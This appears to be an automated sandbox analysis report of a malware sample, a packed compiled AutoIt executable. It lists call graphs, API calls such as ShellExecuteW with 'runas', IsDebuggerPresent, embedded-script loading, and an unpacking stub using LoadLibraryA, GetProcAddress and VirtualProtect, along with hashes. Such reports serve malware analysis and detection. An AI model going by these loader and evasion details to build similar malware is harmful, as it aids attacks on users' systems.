60 API calls 102175->102178 102177 883936 102176->102177 102179 8891b0 60 API calls 102177->102179 102180 88390a 102178->102180 102181 883944 102179->102181 102182 883ee2 60 API calls 102180->102182 102353 889040 102181->102353 102182->102172 102184 883961 102185 8893ea 60 API calls 102184->102185 102186 889040 61 API calls 102184->102186 102187 883ee2 60 API calls 102184->102187 102188 8839a7 Mailbox 102184->102188 102185->102184 102186->102184 102187->102184 102188->102058 102190 8873f2 __write_nolock 102189->102190 102321 883d50 __write_nolock 102320->102321 102322 887d2c 60 API calls 102321->102322 102327 883eb6 Mailbox 102321->102327 102324 883d82 102322->102324 102323 887b52 60 API calls 102323->102324 102324->102323 102333 883db8 Mailbox 102324->102333 102325 887b52 60 API calls 102325->102333 102326 883e89 102326->102327 102328 887f41 60 API calls 102326->102328 102327->102112 102330 883eaa 102328->102330 102329 887f41 60 API calls 102329->102333 102331 883f84 60 API calls 102330->102331 102331->102327 102332 883f84 60 API calls 102332->102333 102333->102325 102333->102326 102333->102327 102333->102329 102333->102332 102335 8a0ff6 Mailbox 60 API calls 102334->102335 102336 88380d 102335->102336 102336->102133 102338 883eec 102337->102338 102339 883f05 102337->102339 102340 8881a7 60 API calls 102338->102340 102341 887d2c 60 API calls 102339->102341 102342 88388b 102340->102342 102341->102342 102343 8a313d 102342->102343 102344 8a3149 102343->102344 102345 8a31be 102343->102345 102349 8a316e 102344->102349 102397 8a8d68 59 API calls __getptd_noexit 102344->102397 102399 8a31d0 61 API calls 3 library calls 102345->102399 102348 8a31cb 102348->102158 102349->102158 102350 8a3155 102398 8a8ff6 9 API calls __cftog_l 102350->102398 102352 8a3160 102352->102158 102354 8bf5a5 102353->102354 102356 889057 102353->102356 102354->102356 102401 888d3b 60 API calls Mailbox 102354->102401 102357 889158 102356->102357 102358 8891a0 102356->102358 102361 88915f 102356->102361 102360 8a0ff6 Mailbox 60 API calls 102357->102360 102400 889e9c 61 API calls Mailbox 102358->102400 102360->102361 102361->102184 102363 885045 86 API calls 102362->102363 102364 8e9854 102363->102364 102365 8e99be 97 API calls 102364->102365 102366 8e9866 102365->102366 102367 88506b 75 API calls 102366->102367 102394 8bd3c1 102366->102394 102368 8e9881 102367->102368 102369 88506b 75 API calls 102368->102369 102370 8e9891 102369->102370 102371 88506b 75 API calls 102370->102371 102372 8e98ac 102371->102372 102373 88506b 75 API calls 102372->102373 102374 8e98c7 102373->102374 102375 885045 86 API calls 102374->102375 102376 8e98de 102375->102376 102377 8a594c __crtLCMapStringA_stat 59 API calls 102376->102377 102378 8e98e5 102377->102378 102379 8a594c __crtLCMapStringA_stat 59 API calls 102378->102379 102380 8e98ef 102379->102380 102381 88506b 75 API calls 102380->102381 102382 8e9903 102381->102382 102383 8e9393 GetSystemTimeAsFileTime 102382->102383 102384 8e9916 102383->102384 102385 8e992b 102384->102385 102386 8e9940 102384->102386 102387 8a2f95 _free 59 API calls 102385->102387 102388 8e9946 102386->102388 102389 8e99a5 102386->102389 102392 8e9931 102387->102392 102390 8e8d90 117 API calls 102388->102390 102391 8a2f95 _free 59 API calls 102389->102391 102393 8e999d 102390->102393 102391->102394 102395 8a2f95 _free 59 API calls 102392->102395 102396 8a2f95 _free 59 API calls 102393->102396 102394->102124 102394->102125 102395->102394 102396->102394 102397->102350 102398->102352 102399->102348 102400->102361 102401->102356 102707 883633 102708 88366a 102707->102708 102709 883688 102708->102709 102710 8836e7 102708->102710 102751 8836e5 102708->102751 102711 88375d PostQuitMessage 102709->102711 102712 883695 102709->102712 102714 8836ed 102710->102714 102715 8bd31c 102710->102715 102747 8836d8 102711->102747 102716 8bd38f 102712->102716 102717 8836a0 102712->102717 102713 8836ca NtdllDefWindowProc_W 102713->102747 102719 8836f2 102714->102719 102720 883715 SetTimer RegisterClipboardFormatW 102714->102720 102757 8911d0 10 API calls Mailbox 102715->102757 102761 8e2a16 72 API calls _memset 102716->102761 102723 8836a8 102717->102723 102724 883767 102717->102724 102721 8836f9 KillTimer 102719->102721 102722 8bd2bf 102719->102722 102725 88373e CreatePopupMenu 102720->102725 102720->102747 102752 8844cb Shell_NotifyIconW _memset 102721->102752 102734 8bd2f8 MoveWindow 102722->102734 102735 8bd2c4 102722->102735 102729 8836b3 102723->102729 102730 8bd374 102723->102730 102755 884531 65 API calls _memset 102724->102755 102725->102747 102727 8bd343 102758 8911f3 332 API calls Mailbox 102727->102758 102739 88374b 102729->102739 102740 8836be 102729->102740 102730->102713 102760 8d817e 60 API calls Mailbox 102730->102760 102731 8bd3a1 102731->102713 102731->102747 102734->102747 102736 8bd2c8 102735->102736 102737 8bd2e7 SetFocus 102735->102737 102736->102740 102742 8bd2d1 102736->102742 102737->102747 102738 88370c 102753 883114 DeleteObject DestroyWindow Mailbox 102738->102753 102754 8845df 82 API calls _memset 102739->102754 102740->102713 102759 8844cb Shell_NotifyIconW _memset 102740->102759 102741 88375b 102741->102747 102756 8911d0 10 API calls Mailbox 102742->102756 102749 8bd368 102750 8843db 69 API calls 102749->102750 102750->102751 102751->102713 102752->102738 102753->102747 102754->102741 102755->102741 102756->102747 102757->102727 102758->102740 102759->102749 102760->102751 102761->102731 102762 881055 102767 882649 102762->102767 102765 8a2f80 __cinit 68 API calls 102766 881064 102765->102766 102768 8877c7 60 API calls 102767->102768 102769 8826b7 102768->102769 102774 883582 102769->102774 102772 882754 102773 88105a 102772->102773 102777 883416 102772->102777 102773->102765 102783 8835b0 102774->102783 102778 88344e 102777->102778 102782 883428 _memmove 102777->102782 102780 8a0ff6 Mailbox 60 API calls 102778->102780 102779 8a0ff6 Mailbox 60 API calls 102781 88342e 102779->102781 102780->102782 102781->102772 102782->102779 102784 8835bd 102783->102784 102785 8835a1 102783->102785 102784->102785 102786 8835c4 RegOpenKeyExW 102784->102786 102785->102772 102786->102785 102787 8835de RegQueryValueExW 102786->102787 102788 883614 RegCloseKey 102787->102788 102789 8835ff 102787->102789 102788->102785 102789->102788 102790 881016 102795 884ad2 102790->102795 102793 8a2f80 __cinit 68 API calls 102794 881025 102793->102794 102796 8a0ff6 Mailbox 60 API calls 102795->102796 102797 884ada 102796->102797 102798 88101b 102797->102798 102802 884a94 102797->102802 102798->102793 102803 884a9d 102802->102803 102805 884aaf 102802->102805 102804 8a2f80 __cinit 68 API calls 102803->102804 102804->102805 102806 884afe 102805->102806 102807 8877c7 60 API calls 102806->102807 102808 884b16 GetVersionExW 102807->102808 102809 887d2c 60 API calls 102808->102809 102810 884b59 102809->102810 102811 887e8c 60 API calls 102810->102811 102816 884b86 102810->102816 102812 884b7a 102811->102812 102813 887886 60 API calls 102812->102813 102813->102816 102814 884bf1 GetCurrentProcess IsWow64Process 102815 884c0a 102814->102815 102818 884c89 GetSystemInfo 102815->102818 102819 884c20 102815->102819 102816->102814 102817 8bdc8d 102816->102817 102820 884c56 102818->102820 102830 884c95 102819->102830 102820->102798 102823 884c7d GetSystemInfo 102826 884c47 102823->102826 102824 884c32 102825 884c95 2 API calls 102824->102825 102827 884c3a GetNativeSystemInfo 102825->102827 102826->102820 102828 884c4d FreeLibrary 102826->102828 102827->102826 102828->102820 102831 884c2e 102830->102831 102832 884c9e LoadLibraryA 102830->102832 102831->102823 102831->102824 102832->102831 102833 884caf GetProcAddress 102832->102833 102833->102831

                                                  Executed Functions

                                                  Function 00883B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00883B7A
                                                  • IsDebuggerPresent.KERNEL32 ref: 00883B8C
                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,009462F8,009462E0,?,?), ref: 00883BFD
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                    • Part of subcall function 00890A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00883C26,009462F8,?,?,?), ref: 00890ACE
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00883C81
                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,009393F0,00000010), ref: 008BD4BC
                                                  • SetCurrentDirectoryW.KERNEL32(?,009462F8,?,?,?), ref: 008BD4F4
                                                  • GetForegroundWindow.USER32 ref: 008BD57A
                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 008BD581
                                                    • Part of subcall function 00883A58: GetSysColorBrush.USER32(0000000F), ref: 00883A62
                                                    • Part of subcall function 00883A58: LoadCursorW.USER32(00000000,00007F00), ref: 00883A71
                                                    • Part of subcall function 00883A58: LoadIconW.USER32(00000063), ref: 00883A88
                                                    • Part of subcall function 00883A58: LoadIconW.USER32(000000A4), ref: 00883A9A
                                                    • Part of subcall function 00883A58: LoadIconW.USER32(000000A2), ref: 00883AAC
                                                    • Part of subcall function 00883A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00883AD2
                                                    • Part of subcall function 00883A58: RegisterClassExW.USER32(?), ref: 00883B28
                                                    • Part of subcall function 008839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00883A15
                                                    • Part of subcall function 008839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00883A36
                                                    • Part of subcall function 008839E7: ShowWindow.USER32(00000000), ref: 00883A4A
                                                    • Part of subcall function 008839E7: ShowWindow.USER32(00000000), ref: 00883A53
                                                    • Part of subcall function 008843DB: _memset.LIBCMT ref: 00884401
                                                    • Part of subcall function 008843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008844A6
                                                  Strings
                                                  • This is a third-party compiled AutoIt script., xrefs: 008BD4B4
                                                  • runas, xrefs: 008BD575
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                  • String ID: This is a third-party compiled AutoIt script.$runas
                                                  • API String ID: 529118366-3287110873
                                                  • Opcode ID: d96f1bfe84f3a21768920248462e3f0cef9ce5e3835b28c451f8080f3fd88b58
                                                  • Instruction ID: 4c6c1791734bafb2091e6875fdf8e64732a7af2dabcc0b593d81b2984bcc70f9
                                                  • Opcode Fuzzy Hash: d96f1bfe84f3a21768920248462e3f0cef9ce5e3835b28c451f8080f3fd88b58
                                                  • Instruction Fuzzy Hash: B05104B5A08249BFCF21BBB8DC15EED7B75FB46704B004065F461E22A1DAB09605EB23
                                                  Function 00883633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 765 883633-883681 767 8836e1-8836e3 765->767 768 883683-883686 765->768 767->768 771 8836e5 767->771 769 883688-88368f 768->769 770 8836e7 768->770 772 88375d-883765 PostQuitMessage 769->772 773 883695-88369a 769->773 775 8836ed-8836f0 770->775 776 8bd31c-8bd34a call 8911d0 call 8911f3 770->776 774 8836ca-8836d2 NtdllDefWindowProc_W 771->774 781 883711-883713 772->781 777 8bd38f-8bd3a3 call 8e2a16 773->777 778 8836a0-8836a2 773->778 780 8836d8-8836de 774->780 782 8836f2-8836f3 775->782 783 883715-88373c SetTimer RegisterClipboardFormatW 775->783 812 8bd34f-8bd356 776->812 777->781 805 8bd3a9 777->805 786 8836a8-8836ad 778->786 787 883767-883776 call 884531 778->787 781->780 784 8836f9-88370c KillTimer call 8844cb call 883114 782->784 785 8bd2bf-8bd2c2 782->785 783->781 788 88373e-883749 CreatePopupMenu 783->788 784->781 797 8bd2f8-8bd317 MoveWindow 785->797 798 8bd2c4-8bd2c6 785->798 792 8836b3-8836b8 786->792 793 8bd374-8bd37b 786->793 787->781 788->781 803 88374b-88375b call 8845df 792->803 804 8836be-8836c4 792->804 793->774 802 8bd381-8bd38a call 8d817e 793->802 797->781 799 8bd2c8-8bd2cb 798->799 800 8bd2e7-8bd2f3 SetFocus 798->800 799->804 808 8bd2d1-8bd2e2 call 8911d0 799->808 800->781 802->774 803->781 804->774 804->812 805->774 808->781 812->774 816 8bd35c-8bd36f call 8844cb call 8843db 812->816 816->774
                                                  APIs
                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 008836D2
                                                  • KillTimer.USER32(?,00000001), ref: 008836FC
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0088371F
                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0088372A
                                                  • CreatePopupMenu.USER32 ref: 0088373E
                                                  • PostQuitMessage.USER32(00000000), ref: 0088375F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                  • String ID: TaskbarCreated
                                                  • API String ID: 157504867-2362178303
                                                  • Opcode ID: 60062132bb45698520a775210da0eba1b6a7d7c05e92bd2b3379bf6a49e0e2f6
                                                  • Instruction ID: 0c062564df891e824807cee73e0d8f50918cce7d87a9ae7672ca2534f889320a
                                                  • Opcode Fuzzy Hash: 60062132bb45698520a775210da0eba1b6a7d7c05e92bd2b3379bf6a49e0e2f6
                                                  • Instruction Fuzzy Hash: 3C41D4F2218209BBDF24BB6CDC09F793795F716700F140539F602C63A2EAA19A04A763
                                                  Function 00884AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 994 884afe-884b5e call 8877c7 GetVersionExW call 887d2c 999 884c69-884c6b 994->999 1000 884b64 994->1000 1001 8bdb90-8bdb9c 999->1001 1002 884b67-884b6c 1000->1002 1003 8bdb9d-8bdba1 1001->1003 1004 884c70-884c71 1002->1004 1005 884b72 1002->1005 1007 8bdba3 1003->1007 1008 8bdba4-8bdbb0 1003->1008 1006 884b73-884baa call 887e8c call 887886 1004->1006 1005->1006 1016 8bdc8d-8bdc90 1006->1016 1017 884bb0-884bb1 1006->1017 1007->1008 1008->1003 1010 8bdbb2-8bdbb7 1008->1010 1010->1002 1012 8bdbbd-8bdbc4 1010->1012 1012->1001 1014 8bdbc6 1012->1014 1018 8bdbcb-8bdbce 1014->1018 1019 8bdca9-8bdcad 1016->1019 1020 8bdc92 1016->1020 1017->1018 1021 884bb7-884bc2 1017->1021 1022 884bf1-884c08 GetCurrentProcess IsWow64Process 1018->1022 1023 8bdbd4-8bdbf2 1018->1023 1028 8bdc98-8bdca1 1019->1028 1029 8bdcaf-8bdcb8 1019->1029 1024 8bdc95 1020->1024 1025 884bc8-884bca 1021->1025 1026 8bdc13-8bdc19 1021->1026 1030 884c0a 1022->1030 1031 884c0d-884c1e 1022->1031 1023->1022 1027 8bdbf8-8bdbfe 1023->1027 1024->1028 1032 8bdc2e-8bdc3a 1025->1032 1033 884bd0-884bd3 1025->1033 1036 8bdc1b-8bdc1e 1026->1036 1037 8bdc23-8bdc29 1026->1037 1034 8bdc08-8bdc0e 1027->1034 1035 8bdc00-8bdc03 1027->1035 1028->1019 1029->1024 1038 8bdcba-8bdcbd 1029->1038 1030->1031 1039 884c89-884c93 GetSystemInfo 1031->1039 1040 884c20-884c30 call 884c95 1031->1040 1044 8bdc3c-8bdc3f 1032->1044 1045 8bdc44-8bdc4a 1032->1045 1041 8bdc5a-8bdc5d 1033->1041 1042 884bd9-884be8 1033->1042 1034->1022 1035->1022 1036->1022 1037->1022 1038->1028 1043 884c56-884c66 1039->1043 1053 884c7d-884c87 GetSystemInfo 1040->1053 1054 884c32-884c3f call 884c95 1040->1054 1041->1022 1047 8bdc63-8bdc78 1041->1047 1048 8bdc4f-8bdc55 1042->1048 1049 884bee 1042->1049 1044->1022 1045->1022 1051 8bdc7a-8bdc7d 1047->1051 1052 8bdc82-8bdc88 1047->1052 1048->1022 1049->1022 1051->1022 1052->1022 1056 884c47-884c4b 1053->1056 1059 884c41-884c45 GetNativeSystemInfo 1054->1059 1060 884c76-884c7b 1054->1060 1056->1043 1058 884c4d-884c50 FreeLibrary 1056->1058 1058->1043 1059->1056 1060->1059
                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 00884B2B
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                  • GetCurrentProcess.KERNEL32(?,0090FAEC,00000000,00000000,?), ref: 00884BF8
                                                  • IsWow64Process.KERNEL32(00000000), ref: 00884BFF
                                                  • GetNativeSystemInfo.KERNEL32(00000000), ref: 00884C45
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00884C50
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00884C81
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00884C8D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                  • String ID:
                                                  • API String ID: 1986165174-0
                                                  • Opcode ID: a394d47e262ebf78e64a6c782c42e832c2a3dd1d19df85f0deb1a6051235c023
                                                  • Instruction ID: fad6916b993999c5e6e691e07ff9bc649d639e2e9988dc5e4c6ec0b6da844923
                                                  • Opcode Fuzzy Hash: a394d47e262ebf78e64a6c782c42e832c2a3dd1d19df85f0deb1a6051235c023
                                                  • Instruction Fuzzy Hash: C691C43254EBC5DEC731DB6884611AABFE5FF26310B58495ED0CAC3B01D234E908D719
                                                  Function 00884FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1061 884fe9-885001 CreateStreamOnHGlobal 1062 885021-885026 1061->1062 1063 885003-88501a FindResourceExW 1061->1063 1064 8bdd5c-8bdd6b LoadResource 1063->1064 1065 885020 1063->1065 1064->1065 1066 8bdd71-8bdd7f SizeofResource 1064->1066 1065->1062 1066->1065 1067 8bdd85-8bdd90 LockResource 1066->1067 1067->1065 1068 8bdd96-8bddb4 1067->1068 1068->1065
                                                  APIs
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00884FF9
                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00884EEE,?,?,00000000,00000000), ref: 00885010
                                                  • LoadResource.KERNEL32(?,00000000,?,?,00884EEE,?,?,00000000,00000000,?,?,?,?,?,?,00884F8F), ref: 008BDD60
                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00884EEE,?,?,00000000,00000000,?,?,?,?,?,?,00884F8F), ref: 008BDD75
                                                  • LockResource.KERNEL32(00884EEE,?,?,00884EEE,?,?,00000000,00000000,?,?,?,?,?,?,00884F8F,00000000), ref: 008BDD88
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                  • String ID: SCRIPT
                                                  • API String ID: 3051347437-3967369404
                                                  • Opcode ID: 590a27a9c67d1990cbd6bd26b4ffc058992510d98fff38c6a03e4cef46f2d2b3
                                                  • Instruction ID: 0abcacc66ccd3473931b032a7eb0ee8fe620690d6c23c6398ee182826cbc15c0
                                                  • Opcode Fuzzy Hash: 590a27a9c67d1990cbd6bd26b4ffc058992510d98fff38c6a03e4cef46f2d2b3
                                                  • Instruction Fuzzy Hash: F4119A75200B00BFD7319B69DC68F677BB9FBC9B11F208168F416C6660DB61E8009660
                                                  Function 0099F090 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1131 99f090-99f09d 1132 99f0aa-99f0af 1131->1132 1133 99f0b1 1132->1133 1134 99f0a0-99f0a5 1133->1134 1135 99f0b3 1133->1135 1136 99f0a6-99f0a8 1134->1136 1137 99f0b8-99f0ba 1135->1137 1136->1132 1136->1133 1138 99f0bc-99f0c1 1137->1138 1139 99f0c3-99f0c7 1137->1139 1138->1139 1140 99f0c9 1139->1140 1141 99f0d4-99f0d7 1139->1141 1142 99f0cb-99f0d2 1140->1142 1143 99f0f3-99f0f8 1140->1143 1144 99f0d9-99f0de 1141->1144 1145 99f0e0-99f0e2 1141->1145 1142->1141 1142->1143 1146 99f10b-99f10d 1143->1146 1147 99f0fa-99f103 1143->1147 1144->1145 1145->1137 1150 99f10f-99f114 1146->1150 1151 99f116 1146->1151 1148 99f17a-99f17d 1147->1148 1149 99f105-99f109 1147->1149 1152 99f182-99f185 1148->1152 1149->1151 1150->1151 1153 99f118-99f11b 1151->1153 1154 99f0e4-99f0e6 1151->1154 1157 99f187-99f189 1152->1157 1158 99f11d-99f122 1153->1158 1159 99f124 1153->1159 1155 99f0e8-99f0ed 1154->1155 1156 99f0ef-99f0f1 1154->1156 1155->1156 1160 99f145-99f154 1156->1160 1157->1152 1161 99f18b-99f18e 1157->1161 1158->1159 1159->1154 1162 99f126-99f128 1159->1162 1163 99f164-99f171 1160->1163 1164 99f156-99f15d 1160->1164 1161->1152 1165 99f190-99f1ac 1161->1165 1166 99f12a-99f12f 1162->1166 1167 99f131-99f135 1162->1167 1163->1163 1170 99f173-99f175 1163->1170 1164->1164 1169 99f15f 1164->1169 1165->1157 1171 99f1ae 1165->1171 1166->1167 1167->1162 1168 99f137 1167->1168 1172 99f139-99f140 1168->1172 1173 99f142 1168->1173 1169->1136 1170->1136 1174 99f1b4-99f1b8 1171->1174 1172->1162 1172->1173 1173->1160 1175 99f1ba-99f1d0 LoadLibraryA 1174->1175 1176 99f1ff-99f202 1174->1176 1177 99f1d1-99f1d6 1175->1177 1178 99f205-99f20c 1176->1178 1177->1174 1179 99f1d8-99f1da 1177->1179 1180 99f20e-99f210 1178->1180 1181 99f230-99f260 VirtualProtect * 2 1178->1181 1182 99f1dc-99f1e2 1179->1182 1183 99f1e3-99f1f0 GetProcAddress 1179->1183 1184 99f223-99f22e 1180->1184 1185 99f212-99f221 1180->1185 1186 99f264-99f268 1181->1186 1182->1183 1187 99f1f9 ExitProcess 1183->1187 1188 99f1f2-99f1f7 1183->1188 1184->1185 1185->1178 1186->1186 1189 99f26a 1186->1189 1188->1177
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(?), ref: 0099F1CA
                                                  • GetProcAddress.KERNEL32(?,00998FF9), ref: 0099F1E8
                                                  • ExitProcess.KERNEL32(?,00998FF9), ref: 0099F1F9
                                                  • VirtualProtect.KERNELBASE(00880000,00001000,00000004,?,00000000), ref: 0099F247
                                                  • VirtualProtect.KERNEL32(00880000,00001000), ref: 0099F25C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                  • String ID:
                                                  • API String ID: 1996367037-0
                                                  • Opcode ID: a57b1c306f46081fcef313c5b8e22add017808ad4ce27beddee57741ec5093a0
                                                  • Instruction ID: e326af8e9cffe4833b2e94728a1ee1960472bf9794d6ae9fcd004e7e3f7c58e0
                                                  • Opcode Fuzzy Hash: a57b1c306f46081fcef313c5b8e22add017808ad4ce27beddee57741ec5093a0
                                                  • Instruction Fuzzy Hash: D8511B72A587529BDF309EBCDCE0664F7A8EB55324B2C0739C5E1C73C6E7A4580687A0
                                                  Function 008E4696 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,008BE7C1), ref: 008E46A6
                                                  • FindFirstFileW.KERNELBASE(?,?), ref: 008E46B7
                                                  • FindClose.KERNEL32(00000000), ref: 008E46C7
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
